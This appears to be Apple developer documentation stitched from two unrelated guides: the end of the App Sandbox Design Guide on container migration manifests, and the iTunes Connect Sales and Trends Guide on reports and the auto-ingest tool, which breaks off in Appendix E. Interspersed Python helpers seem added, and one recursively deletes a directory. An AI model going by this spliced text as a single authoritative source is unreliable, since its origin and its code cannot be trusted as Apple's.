To control the destination of a migrated file or directory

1. In the container migration manifest, add a new item to the Move array.
2. In the Type column, choose Array.
3. Add two strings as children of the new array item.
4. In the top string of the pair, specify the origin path of the file or directory you want to migrate.
5. In the bottom string of the pair, specify the destination (sandbox) custom path for the file or directory you want to migrate.

File migration proceeds from top to bottom through the container migration manifest. Take care to list items in an order that works. For example, suppose you want to move your entire Application Support directory as-is, except for one file. You want that file to go into a new directory parallel to Application Support in the container. For this approach to work, you must specify the individual file move before you specify the move of the Application Support directory; that is, specify the individual file move higher in the container migration manifest. (If Application Support were specified to be moved first, the individual file would no longer be at its original location at the time the migration process attempted to move it to its new, custom location in the container.)

Undoing a Migration for Testing

When testing migration of support files, you may find it necessary to perform migration more than once. To support this, you need a way to restore your starting directory structures (that is, the structures as they exist prior to migration).

One way to do this is to make a copy of the directories to migrate, before you perform a first migration. Save this copy in a location unaffected by the migration manifest. The following task assumes you have created this sort of backup copy.

To manually undo a container migration for testing purposes

1. Manually copy the files and directories (those specified in the manifest) from your backup copy to their original (premigration) locations.
2. Delete your app’s container.

The next time you launch the app, the system recreates the container and migrates the support files according to the current version of the container migration manifest.
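The two undo steps lend themselves to a small helper script for repeated test runs. The Python sketch below is one possible approach, not a tool from this guide. The function name undo_migration and its parameters are hypothetical, and it assumes your backup mirrors the home-relative layout of the original items. Because it deletes the directory you pass as the container, try it on scratch directories first.

```python
import shutil
from pathlib import Path


def undo_migration(backup_root, home, container, relative_items):
    """Restore backed-up items to their original places, then delete the container.

    relative_items are home-relative paths such as
    "Library/Application Support/MyApp" (hypothetical example).
    """
    backup_root, home, container = Path(backup_root), Path(home), Path(container)
    # Step 1: copy each item from the backup to its premigration location.
    for rel in relative_items:
        src = backup_root / rel
        dst = home / rel
        dst.parent.mkdir(parents=True, exist_ok=True)
        if src.is_dir():
            shutil.copytree(src, dst, dirs_exist_ok=True)
        else:
            shutil.copy2(src, dst)
    # Step 2: delete the app's container so the next launch migrates again.
    if container.exists():
        shutil.rmtree(container)
```

The helper copies rather than moves from the backup, so the backup stays intact for the next test cycle.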
An Example Container Migration Manifest

Listing 4-1 shows an example manifest as viewed in a text editor.

Listing 4-1 An example container migration manifest

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Move</key>
        <array>
            <string>${Library}/MyApp/MyConfiguration.plist</string>
            <array>
                <string>${Library}/MyApp/MyDataStore.xml</string>
                <string>${ApplicationSupport}/MyApp/MyDataStore.xml</string>
            </array>
        </array>
    </dict>
    </plist>

This manifest specifies the migration of two items from the user’s Library directory to the app’s container. For the first item, MyConfiguration.plist, only the origin path is specified, leaving it to the migration process to place the file appropriately. For the second item, MyDataStore.xml, both an origin and a custom destination path are specified.

The ${Library} and ${ApplicationSupport} portions of the paths are variables you can use as a convenience. For a list of variables you can use in a container migration manifest, see “Use Variables to Specify Support-File Directories” (page 37).

Use Variables to Specify Support-File Directories

When you specify a path in a container migration manifest, you can use certain variables that correspond to commonly used support file directories. These variables work in origin and destination paths, but the path that a variable resolves to depends on the context. Refer to Table 4-1.

Table 4-1 How system directory variables resolve depending on context

    Context            Variable resolves to
    Origin path        Home-relative path (relative to the ~ directory)
    Destination path   Container-relative path (relative to the Data directory in the container)

The variables you can use for specifying support-file directories are described in Table 4-2 (page 38). For an example of how to use these variables, see Listing 4-1 (page 36).
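The context rule in Table 4-1 can be sketched as a small resolver. The Python code below is an illustration under stated assumptions, not the system's actual algorithm: the function name resolve is hypothetical, only four variables are modeled, and their home-relative subpaths are assumed from the standard locations of the corresponding search-path directories.

```python
from pathlib import PurePosixPath

# Assumed home-relative subpaths for a few of the manifest variables.
VARIABLES = {
    "${ApplicationSupport}": "Library/Application Support",
    "${Caches}": "Library/Caches",
    "${Documents}": "Documents",
    "${Library}": "Library",
}


def resolve(path, context, home, container):
    """Expand a leading variable for an 'origin' or 'destination' path."""
    if context == "origin":
        base = PurePosixPath(home)               # relative to ~
    elif context == "destination":
        base = PurePosixPath(container) / "Data"  # relative to the Data directory
    else:
        raise ValueError("context must be 'origin' or 'destination'")
    for variable, subpath in VARIABLES.items():
        if path.startswith(variable):
            remainder = path[len(variable):].lstrip("/")
            return str(base / subpath / remainder)
    raise ValueError("path does not start with a modeled variable")
```

Applied to the second item in Listing 4-1, the origin string resolves under the home directory while the destination string resolves under the container's Data directory, even though both use the same variable syntax.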
You can also use a special variable that resolves to your app’s bundle identifier, allowing you to conveniently incorporate it into an origin or destination path. This variable is ${BundleId}.

Table 4-2  Variables for support-file directories

Variable | Directory
${ApplicationSupport} | The directory containing application support files. Corresponds to the NSApplicationSupportDirectory search-path constant.
${AutosavedInformation} | The directory containing the user’s autosaved documents. Corresponds to the NSAutosavedInformationDirectory search-path constant.
${Caches} | The directory containing discardable cache files. Corresponds to the NSCachesDirectory search-path constant.
${Document}, ${Documents} | Each variable corresponds to the directory containing the user’s documents. Corresponds to the NSDocumentDirectory search-path constant.
${Home} | The current user’s home directory. Corresponds to the directory returned by the NSHomeDirectory function. When in a destination path in a manifest, resolves to the Container directory.
${Library} | The directory containing application-related support and configuration files. Corresponds to the NSLibraryDirectory search-path constant.

This table describes the changes to App Sandbox Design Guide.

Date Notes 2012-09-19 Clarified information about launching external tools. 2012-07-23 Added an explanation of app group containers. Improved the explanation of security-scoped bookmarks in “Security-Scoped Bookmarks and Persistent Resource Access” (page 21); updated that section for OS X v10.7.4. 2012-05-14 Added a brief section in the “Designing for App Sandbox” chapter: “Retaining Access to File System Resources” (page 29). Improved the discussion in “Opening, Saving, and Tracking Documents” (page 29), adding information about using file coordinators.
Corrected the information in “Creating a Login Item for Your App” (page 30). Improved explanation of security-scoped bookmarks in “Security-Scoped Bookmarks and Persistent Resource Access” (page 21). 2012-03-14 Clarified the explanation of the container directory in “The App Sandbox Container Directory” (page 16). Updated for OS X v10.7.3, including an explanation of how to use security-scoped bookmarks. 2012-02-16 Added a section explaining how to provide persistent access to file-system resources, “Security-Scoped Bookmarks and Persistent Resource Access” (page 21). Expanded the discussion in “Powerbox and File System Access Outside of Your Container” (page 17) to better explain how user actions expand your app’s file system access. Added a section detailing the changes in behavior of Open and Save dialogs, “Open and Save Dialog Behavior with App Sandbox” (page 19). New document that explains Apple's security technology for damage containment, and how to use it. 2011-09-27 Portions of this document were previously published in Code Signing and Application Sandboxing Guide.

Apple Inc.
© 2012 Apple Inc. All rights reserved.

No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice.

No licenses, express or implied, are granted with respect to any of the technology described in this document.
Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers.

Apple Inc.
1 Infinite Loop
Cupertino, CA 95014
408-996-1010

Apple, the Apple logo, Cocoa, Finder, iTunes, Keychain, Mac, OS X, Sand, and Xcode are trademarks of Apple Inc., registered in the U.S. and other countries. QuickStart is a trademark of Apple Inc. iCloud is a service mark of Apple Inc., registered in the U.S. and other countries. App Store and Mac App Store are service marks of Apple Inc. iOS is a trademark or registered trademark of Cisco in the U.S. and other countries and is used under license.

Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY.

IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages.

THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty.

Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state.

iTunes Connect Sales and Trends Guide, App Store
Apple Inc.
iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 1Apple Inc. © 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. The Apple logo is a trademark of Apple Inc. Use of the “keyboard” Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist partners in understanding the Sales and Trends module of iTunes Connect. Every effort has been made to ensure that the information in this document is accurate. Apple is not responsible for typographical errors. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. 
IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages.

THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty.

Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state.

Contents

1. Getting Started
2. Navigating and Viewing Your Sales and Trends Data
2.1. Dashboard View
2.2. Sales View
3. Downloading, Reading and Understanding Sales and Trends Data
3.1. Downloading Reports
3.2. Auto-Ingest Tool
3.3. Reading Reports
3.4. Understanding Units
4. Contact Us
Appendix A - Sales Report Field Definitions
Appendix B - Opt-In Report Field Definitions
Appendix C - Apple Fiscal Calendar
Appendix D - Definition of Day and Week
Appendix E - Product Type Identifiers
Appendix F - Country Codes
Appendix G - Promotional Codes
Appendix H - Currency Codes
Appendix I - Subscription and Period Field Values
Appendix J - FAQs
Appendix K - Sample Sales Report
Appendix L - Other Uses
Appendix M - Newsstand Report Field Definitions

1. Getting Started

iTunes Connect can be accessed at http://itunesconnect.apple.com.
Once you log in, you will be presented with the Welcome page below, which contains notifications at the top and module links to help you navigate through iTunes Connect. The Welcome page you will see is based on the modules applicable to you and may be different from what is shown below. This guide is primarily intended to cover the Sales and Trends module.

The initial user who entered into the program license agreement has the “Admin” role, which provides access to all modules, including the ability to add other “Admin” users (using the Manage Users module). The “Admin” users associated with your account are expected to manage (add, modify, and delete) your users based on your needs.

2. Navigating and Viewing Your Sales and Trends Data

The iTunes Connect Sales and Trends module allows you to interact with your sales data in various ways:

■ A summary that provides total units, percent differences, graphs, top selling content and largest market information (Dashboard view).
■ Previews that provide the top 50 transactions of sales aggregated at the title level in descending sorted order (Sales view).
■ Full transaction reports that you can download for import and further analysis (Sales view).

When you are ready to access the Sales and Trends module, click on the following link located on the Welcome page:

Upon selecting the Sales and Trends module, you will be taken to the Dashboard view.

2.1. Dashboard View

The Dashboard will load and display the most recent daily data available. The following identifies the various components of the dashboard. The “Selection” controls located above the graph allow you to change the information displayed.
Vendor Selection

The Vendor Selection display lists the legal entity name for the Sales and Trends that you are viewing.

View Selection

The View Selection allows you to switch between different views. In addition to the Dashboard view, you can toggle to the Sales view (the Sales view is covered in section 2.2).

Period Selection

You can choose the type (daily or weekly), as well as the period of interest. The date menu will display all periods available up to the last 13 weeks or 14 days.

Category Selection

You can choose the specific category you wish to view in the Dashboard if you sell more than one type of content (for example, iOS and Mac OS).

Type Selection

You can choose the specific type of content within a category to view in the Dashboard’s graph, Top Products and Top Markets. The available types are the same for both the iOS and Mac OS categories. Refer to Appendix E for the complete product breakdown by product type.

Graph Selection

You can choose between a line graph and a bar graph by clicking on the graph buttons located at the top right corner of the graph.

Graph

The data displayed in the graph is based on the period (specific day or week), category and type selected. When you hover over a specific day or week in the graph (bar or line), the date, number of units and type will be displayed.

The following displays the graph for the period of August 30, 2010 and the Free Apps category while mousing over the August 30, 2010 bar. When viewing daily reports, the graph will also display the percentage change from the same day in the prior period.
In the graph above you see the percentage change of free apps sold on 8/30 (Monday) to those sold on 8/23 (Monday of prior week) based on units.

Top Products Display

The Top Products display is based on the period (specific day or week), category (iOS or Mac OS) and the type (Free Apps, Paid Apps, In Apps, Updates) selected. The section provides a summary of net units at the Product level. A Product can be reported as separate lines in your reports due to differences such as territories, but it is reported as a single combined unit count in this display because units are aggregated worldwide at the Product level, based on the unique product identifier. The “Change” column in the display shows units and percentage change from the prior period (selected day over same day of the prior week, or selected week over prior week).

Top Markets Display

The Top Markets display is based on the period (specific day or week), category (iOS or Mac OS) and the type (e.g. Free Apps) selected. This section provides a summary of net units for all products at the country (iTunes Storefront) level. The “Change” column in the display shows units and percentage change from the prior period (selected day over same day of the prior week, or selected week over prior week). See Appendix F for iTunes Storefront listing.

Resources

At the bottom left of all pages you will find three links:

■ Fiscal Calendar - Opens a new window that displays Apple’s fiscal calendar
■ User Guide - Provides the most current version of this guide
■ Mobile Guide - Provides the user guide for the iTC Mobile Application.
Done Button

The “Done” button at the bottom right of all pages takes you to the Dashboard from the Sales view, and to the iTunes Connect Welcome page from the Dashboard.

2.2. Sales View

The Sales view allows you to analyze at the specific content level. You can preview the Top 50 products delivered, summarized by transaction volume and sorted in descending order by Units, and you can download the available daily and weekly reports for additional information about all your transactions. You can also download detailed Newsstand reports or contact information for customers that have elected to “opt-in” when purchasing an In-App Purchase subscription. The following is an example of the Sales view.

Understanding The Sales Preview

When you land on the Sales view, the Period presented is the latest daily data available. Using the Period Selection menu, you can preview all available daily and weekly data for all content types in all categories. Once you have selected a period, the Preview will be displayed.

The Preview summarizes the data based on the columns displayed, including any promotional transactions indicated with (Promo Indicator). You can hover over the Promo Indicator to see the type of promotion. See Appendix G for Promotional Codes. Auto-renewable subscription transactions are indicated with (Subscription Indicator).

The preview functionality does not contain the full report. To view or analyze all transactions you must download the full reports. The previews summarize data differently than the reports based on the information available (for example, the preview may summarize sales at a higher level because the downloaded report has more fields to consider).
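The kind of summary the Sales preview describes (units aggregated at the title level, sorted descending, limited to the top 50) can be approximated on a downloaded report. The following is a minimal sketch, assuming each row has already been parsed into a dictionary keyed by the Title and Units field names from Appendix A; the function name `preview` and the sample rows are hypothetical, and this does not claim to reproduce how iTunes Connect computes its preview.

```python
from collections import defaultdict


def preview(rows, limit=50):
    """Sum units per title and return the top `limit` titles, largest first."""
    totals = defaultdict(int)
    for row in rows:
        totals[row["Title"]] += row["Units"]
    # Sort by total units, descending, then keep only the first `limit` entries.
    ranked = sorted(totals.items(), key=lambda item: item[1], reverse=True)
    return ranked[:limit]


# Hypothetical rows: the same title can appear on several report lines,
# for example once per storefront.
sample_rows = [
    {"Title": "App A", "Country Code": "US", "Units": 5},
    {"Title": "App A", "Country Code": "GB", "Units": 3},
    {"Title": "App B", "Country Code": "US", "Units": 12},
]

for title, units in preview(sample_rows):
    print(title, units)
```

Because the full report splits units across more fields than the preview shows, totals produced this way are per title only.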
3. Downloading, Reading and Understanding Sales and Trends Data

3.1. Downloading Reports

You may download the Sales reports from the respective Sales view. To download a report (tab delimited zipped text file), you must select a report period (a day or a week-ending date) and press the download button to the right of the period selection menu. For a complete listing of fields please see Appendix A, B and M.

If you are using Mac OS X the reports will automatically open when downloaded. If you are using a Windows OS you will need to download an application (for example WinZip) to decompress the “.gz” file prior to use. You can then import the tab delimited text file to a database or spreadsheet application (Numbers, MS Excel) and analyze or manipulate your data as needed.

Weekly reports cover Monday through Sunday and are available on Mondays. The daily reports represent the 24 hour period in the time zone of the respective storefront (territory). Please refer to Appendix D for the definition of Day and Week.

We do not store or regenerate the data after the periods have expired (14 rolling days and 13 rolling weeks); you will need to download and store this data on a regular basis if you intend to use it in the future.

Downloading Customer Opt-In Information

If your apps have auto-renewable subscriptions, you can download contact information for customers who have elected to “opt-in” to personal information sharing. To download the report (tab delimited zipped text file), you must select a weekly report period and click Opt-In Report next to Download Report.

To open the encrypted .zip file that is downloaded, you need to use the Opt-In Passkey.
To obtain the Opt-In Passkey, click the Opt-In Passkey button in the upper right of the screen. The passkey will be displayed in a lightbox. Copy and paste this value to use it to unpack the .zip file and access the Opt-In Report. You will need to use a decompression tool like StuffIt Expander or WinZip to open the encrypted file once you have downloaded it.

Downloading Newsstand Reports

If you have one or more Newsstand apps available for sale, you can download Newsstand reports by clicking Newsstand Detailed. Newsstand reports are also available via auto-ingest.

3.2. Auto-Ingest Tool

Apple provides access to a Java based tool to allow you to automate the download of your iTunes Connect Sales and Trends reports. To use the auto-ingest tool, configuration on your part will be required. This tool allows you to automate the retrieval of:

• Daily Summary Reports
• Weekly Summary Reports
• Opt-In Reports
• Newsstand Reports

As new reports become available we will modify and redeliver the Java package or provide new parameters to use to download new products (that is, we will modify the script for new features). We will communicate both the anticipated date of the report release and the date that the tool will be able to retrieve reports.

You may not alter or disseminate the auto-ingest tool for any reason. We reserve the right to revoke access for usage or distribution beyond its intended use.

Auto-Ingest Instructions

You must have Java installed on the machine where you are running the auto-ingest tool. The tool will work as expected with Java version 1.6 or above.

Follow the steps below to set up the environment for auto-ingestion:

1. Download and save the file Autoingestion.class to the directory where you want the reports delivered. http://www.apple.com/itunesnews/docs/Autoingestion.class.zip
2.
To run the Java class file, change the command line directory to the directory where the class file is stored.
3. Invoke the following from the command line:

java Autoingestion <username> <password> <vendorid> <report_type> <date_type> <report_subtype> <date>

All items contained within “< >” are variable and will require you to define them. Of the 7 parameters only the date is optional. If you do not put a date in the parameter we will provide you the latest available report (the other parameters are mandatory). You will need to delimit the parameters with a space.

Parameters Definitions

Variable | Value | Notes
username | Your user name | The user name you use to log into iTunes Connect
password | Your password | The password you use to log into iTunes Connect
vendorid | 8####### (your unique number) | Vendor ID for the entity for which you want to download the report
report_type | Sales or Newsstand | This is the report type you want to download.
date_type | Daily or Weekly | Selecting Weekly will provide you the Weekly version of the report. Selecting Daily will provide you the Daily version of the report.
report_subtype | Summary, Detailed or Opt-In | This is the parameter for the Sales Reports. Note: Detailed can only be used for Newsstand reports.
Date (optional) | YYYYMMDD | This is the date of the report you are requesting. If the value for the Date parameter is not provided, you will get the latest report available.

Example: You access iTunes Connect with user name “john@xyz.com” and your password is “letmein” for company 80012345, and you want to download a sales - daily - summary report for February 4, 2010. You will need to invoke the job by running the following command from the directory where the class file is stored:

java Autoingestion john@xyz.com letmein 80012345 Sales Daily Summary 20100204

Newsstand Reports via Auto-Ingest

If you are using auto-ingest, you can create the reports using the following auto-ingest parameters:

Daily
java Autoingestion Newsstand Daily Detailed
java Autoingestion N D D
java Autoingestion 5 2 1
Weekly
java Autoingestion Newsstand Weekly Detailed
java Autoingestion N W D
java Autoingestion 5 1 1

3.3. Reading Reports

Report File Names

The file names for downloaded reports follow a standard naming convention. Please refer to the matrix below for details.

Report Data: Sales. Report Type: Summary. Reporting Range: Daily.
Naming Convention: S_D_<vendor account number>_<YYYYMMDD>
Example: S_D_80000000_20111104
Description: The first letter identifies that the report provides Sales data at a Summary level. The second letter denotes that it is a Daily report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD').

Report Data: Sales. Report Type: Summary. Reporting Range: Weekly.
Naming Convention: S_W_<vendor account number>_<YYYYMMDD>
Example: S_W_80000000_20111104
Description: The first letter identifies that the report provides Sales data at a Summary level. The second letter denotes that it is a Weekly report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD').

Report Data: Opt-In. Report Type: Summary. Reporting Range: Weekly.
Naming Convention: O_S_W_<vendor account number>_<YYYYMMDD>
Example: O_S_W_80000000_20111104
Description: The first and second letters identify that the report provides customer Opt-In data at a Summary level. The third letter identifies that it is a Weekly report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD').

Report Data: Newsstand. Report Type: Detailed. Reporting Range: Daily.
Naming Convention: N_D_D_<vendor account number>_<YYYYMMDD>
Example: N_D_D_80000000_20111104
Description: The first and second letters identify that the report provides customer Newsstand data at a Detailed level. The third letter identifies that it is a Daily report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD').

Report Data: Newsstand. Report Type: Detailed. Reporting Range: Weekly.
Naming Convention: N_D_W_<vendor account number>_<YYYYMMDD>
Example: N_D_W_80000000_20111104
Description: The first and second letters identify that the report provides customer Newsstand data at a Detailed level. The third letter identifies that it is a Weekly report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD').
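If you archive downloaded reports, the naming convention above can be decoded programmatically. The following is a minimal sketch that handles only the five prefixes listed in the matrix; the function name `parse_report_name` and the dictionary keys it returns are hypothetical, and any file extension after the date is simply ignored (the extension itself is an assumption about how you store the files).

```python
import re
from datetime import datetime

# Prefix -> (report data, report type, reporting range), taken from the matrix above.
PREFIXES = {
    "S_D": ("Sales", "Summary", "Daily"),
    "S_W": ("Sales", "Summary", "Weekly"),
    "O_S_W": ("Opt-In", "Summary", "Weekly"),
    "N_D_D": ("Newsstand", "Detailed", "Daily"),
    "N_D_W": ("Newsstand", "Detailed", "Weekly"),
}

# Prefix, vendor account number, then an 8-digit YYYYMMDD date.
PATTERN = re.compile(r"^(S_D|S_W|O_S_W|N_D_D|N_D_W)_(\d+)_(\d{8})")


def parse_report_name(name):
    """Split a report file name into its documented components."""
    match = PATTERN.match(name)
    if match is None:
        raise ValueError("unrecognized report file name: " + name)
    prefix, vendor, date_text = match.groups()
    data, report_type, reporting_range = PREFIXES[prefix]
    return {
        "data": data,
        "type": report_type,
        "range": reporting_range,
        "vendor": vendor,
        "date": datetime.strptime(date_text, "%Y%m%d").date(),
    }


print(parse_report_name("S_D_80000000_20111104"))
```

Keeping the vendor number as a string avoids losing leading characters if the account number format ever differs from the examples.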
Report Field Names

All reports have a header row which contains the field names of each column. The reports present transactions that can be tracked with your SKU and/or the Apple Identifier. For a complete listing of fields please see Appendix A, B and M.

Key Field Mapping

The following table and screenshots will help you understand which fields in the report were set up by you in iTunes Connect and where they are in the App Store:

Reference | Field Name In Report | Field in iTunes Connect | Field in App Store
1 | Developer | Company Name | Displayed after genre
2 | Title | App Name | Displayed at top of product page
3 | SKU | SKU Number | Not displayed on App Store

Apple Identifier

The Apple Identifier is the unique product identifier assigned by Apple. It is always included in each row of your sales reports. We recommend you provide the Apple Identifier of your app whenever you contact us for support so that your request can be expedited.

You can also access the Apple Identifier by using the links in the App Store: The menu will offer an option for “Copy Link”. The link will look like the link below. The string of numbers highlighted is the Apple Identifier of the app.

http://itunes.apple.com/us/app/remote/id284417350?mt=85

3.4. Understanding Units

The reports are designed to provide valuable information about the activity of your product on the App Store. This can result in many lines for a given product. For each product with a unique Apple Identifier and SKU, units are split by:

■ Storefront / Country Code (US, UK)
■ Sales vs. Refunds
■ Product Type
■ Price
■ Promo Code
■ App Version

Here are some examples of how units are grouped and displayed in both Preview and downloaded reports.
Example 1: If you have one product and you are selling the product in the US, you will see 1 row (1 for US sales) assuming there are no refunds, price changes and promo codes during the period.

Example 2: If you are selling 30 products in the US, and 10 of the products have refunds, then the preview and the downloaded report will have 40 rows and you will see a row for sales and a row for refunds.

Example 3: If you are selling 30 products in the US, and 5 products have a price change in the middle of the week, then your full report and your previews will have 35 rows and you will see 2 lines per app with a price change.

Example 4: If 10 new customers purchase your app and 10 existing customers update to the latest version of your app in the US, then your preview and downloaded report will have 1 row for purchases and 1 row for updates.

Example 5: If 10 customers purchase version 1.1 of your product in the US, and those customers then update to version 1.2 of the same product, then your preview and downloaded report will have 2 rows, 1 row for purchases of version 1.1 and 1 row for updates to version 1.2.

4. Contact Us

If you have any questions or have difficulties viewing or downloading your sales and trends information, please do not hesitate to contact us. The easiest way to ensure your request is routed correctly is to use the Contact Us module. A Contact Us link is available on all pages as part of the footer. You can also find the Contact Us module on the iTunes Connect Homepage:

The link will take you to a page that allows you to select the topic you need help with and will ask a series of questions and provide answers where available. For Sales and Trends inquiries, select the “Sales and Trends” topic.
Appendix A - Sales Report Field Definitions

The definitions apply to Daily and Weekly Reports.

Report Field | Report Data Type | Values | Notes
Provider | CHAR(5) - APPLE | Up to 5 Characters | The service provider in your reports will typically be Apple
Provider Country | CHAR(2) - US | Up to 2 Characters | The service provider country code will typically be US
SKU | VARCHAR(100) | Up to 100 Characters | This is a product identifier provided by you when the app is set up ∇
Developer | VARCHAR(4000) | Up to 4000 Characters | You provided this on initial setup. ∇
Title | VARCHAR(600) | Up to 600 Characters | You provided this when setting up the app ∇
Version | VARCHAR(100) | Up to 100 Characters | You provided this when setting up the app ∇
Product Type Identifier | VARCHAR(20) | Up to 20 Characters | This field defines the type of transaction (e.g. initial download, update, etc.) - See Appendix E
Units | DECIMAL(18,2) | Up to 18 Characters | This is the aggregated number of units
Developer Proceeds (per item) | DECIMAL(18,2) | Up to 18 Characters | Your proceeds for each item delivered
Begin Date | Date | Date in MM/DD/YYYY | Date of beginning of report
End Date | Date | Date in MM/DD/YYYY | Date of end of report
Customer Currency | CHAR(3) | Up to 3 Characters | Three character ISO code indicates the currency the customer paid in - See Appendix H
Country Code | CHAR(2) | Up to 2 Characters | Two character ISO country code indicates what App Store the purchase occurred in - See Appendix F
Currency of Proceeds | CHAR(3) | Up to 3 Characters | Currency your proceeds are earned in - See Appendix H
Apple Identifier | DECIMAL(18,0) | Up to 18 Characters | This is Apple's unique identifier. If you have questions about a product, it is best to include this identifier.
Customer Price | DECIMAL(18,2) | Up to 18 Characters | Retail Price displayed on the App Store and charged to the customer.
Promo Code | VARCHAR(10) | Up to 10 Characters | If the transaction was part of a promotion this field will contain a value. For all non-promotional items this field will be blank - See Appendix G
Parent Identifier | VARCHAR(100) | Up to 100 Characters | For In-App Purchases this will be populated with the SKU from the originating app.
Subscription | VARCHAR(10) | Up to 10 Characters | This field defines whether an auto-renewable subscription purchase is a new purchase or a renewal. See Appendix I.
Period | VARCHAR(30) | Up to 30 Characters | This field defines the duration of an auto-renewable subscription purchase. See Appendix I.

∇ Apple generally does not modify this field. What you provided when setting up your app is passed through on the report.

Appendix B - Opt-In Report Field Definitions

The definitions apply to Weekly Opt-In Reports.

Report Field | Report Data Type | Values | Notes
First Name | VARCHAR(100) | Up to 100 Characters | First Name of Customer
Last Name | VARCHAR(100) | Up to 100 Characters | Last Name of Customer
Email Address | VARCHAR(100) | Up to 100 Characters | Email Address of Customer
Postal Code | VARCHAR(50) | Up to 50 Characters | Postal Code of Customer
Apple Identifier | DECIMAL(18,0) | Up to 18 Characters | This is Apple's unique identifier. If you have questions about a product, it is best to include this identifier.
Report Start Date | DATE | Date in MM/DD/YYYY | Date of beginning of report
Report End Date | DATE | Date in MM/DD/YYYY | Date of end of report

Appendix C - Apple Fiscal Calendar

Monthly Financial Reports are based on Apple’s reporting calendar shown below.
Months represent either four (4) or five (5) weeks (the first month of each quarter has an extra week) and the weeks run from Sunday through Saturday. All months start on Sunday and end on Saturday. Monthly reports are also distributed on iTunes Connect and available based on the contractually agreed timeframes.

Sales and Trends reports are generated using different time frames and represent near immediate feedback of transactions. Finance Reports are based on customer invoicing and financial processing. Reconciliation between the reports is not recommended due to the timing and reporting differences.

Appendix D - Definition of Day and Week

What is a Day?
12:00:00 AM to 11:59:59 PM in the time zone used for that territory (see table below).

What is a Week?
Monday 12:00:00 AM to Sunday 11:59:59 PM

What time is the report date based on?

Territory | Time Zone
US, Canada, Latin America | Pacific Time (PT)
Europe, Middle East, Africa, Asia Pacific | Central Europe Time (CET)
Japan | Japan Standard Time (JST)
Australia, New Zealand | Western Standard Time (WST)

When are reports available?
Reports are generated after the close of business in the final time zone (which is PT). As such, all reports are generally available by 8:00 AM PT for the prior day or week. Earlier access to reporting for other time zones (where the close of business is earlier) is not available.
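The week definition in Appendix D (Monday through Sunday) can be sketched in a few lines. This is only an illustration, not part of the reporting system: the function name `report_week` is hypothetical, and the sketch works on calendar dates only, leaving the per-territory time zone handling from the table above out of scope.

```python
from datetime import date, timedelta
from typing import Tuple


def report_week(day: date) -> Tuple[date, date]:
    """Return the (Monday, Sunday) dates of the report week containing `day`.

    Hypothetical helper: it assumes `day` is already expressed in the
    time zone that applies to the territory in question.
    """
    # date.weekday() returns 0 for Monday and 6 for Sunday.
    monday = day - timedelta(days=day.weekday())
    sunday = monday + timedelta(days=6)
    return monday, sunday


if __name__ == "__main__":
    start, end = report_week(date(2012, 8, 15))
    print(start.isoformat(), end.isoformat())
```

Because Financial Reports follow the Apple Fiscal Calendar (Sunday through Saturday), a helper like this applies only to Sales and Trends weekly reports.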
Appendix E – Product Type Identifiers

Product Type Identifier | Type | Description
1 | Free or Paid Apps | iPhone and iPod Touch, iOS
